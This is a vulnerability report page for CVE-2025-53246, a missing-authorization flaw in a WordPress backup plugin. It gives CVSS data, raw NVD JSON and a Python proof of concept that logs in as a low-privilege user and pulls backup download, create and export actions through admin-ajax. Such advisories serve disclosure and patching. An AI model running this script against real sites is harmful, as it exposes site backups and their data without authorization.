Security Vulnerability Report
中文
CVE-2025-53246 CVSS 6.5 MEDIUM

CVE-2025-53246

Published: 2025-11-06 16:15:56
Last Modified: 2026-04-27 18:16:21

Description

Missing Authorization vulnerability in Gaurav Aggarwal Backup and Move backup-and-move allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Backup and Move: from n/a through <= 0.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Backup and Move插件 <= 0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-53246 PoC - WordPress Backup and Move Plugin Authorization Bypass # Target: WordPress site with vulnerable Backup and Move plugin <= 0.1 target_url = "http://target-wordpress-site.com" # Authentication (any low-privilege user account works) username = "attacker" password = "password123" # Login to WordPress session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In" } session.post(login_url, data=login_data) # Exploit: Access backup functionality without proper authorization # The plugin's backup endpoint does not verify user capabilities backup_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php?action=backup_move_download", f"{target_url}/wp-admin/admin-ajax.php?action=backup_move_create", f"{target_url}/wp-admin/admin-ajax.php?action=backup_move_export" ] print("[*] Testing CVE-2025-53246 - Authorization Bypass in Backup and Move Plugin") for endpoint in backup_endpoints: try: response = session.get(endpoint, timeout=10) if response.status_code == 200 and len(response.content) > 0: print(f"[+] VULNERABLE: {endpoint} - Unauthorized access successful") print(f" Response size: {len(response.content)} bytes") except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("[*] PoC execution completed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53246", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:15:55.833", "lastModified": "2026-04-27T18:16:21.190", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Gaurav Aggarwal Backup and Move backup-and-move allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Backup and Move: from n/a through <= 0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/backup-and-move/vulnerability/wordpress-backup-and-move-plugin-0-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}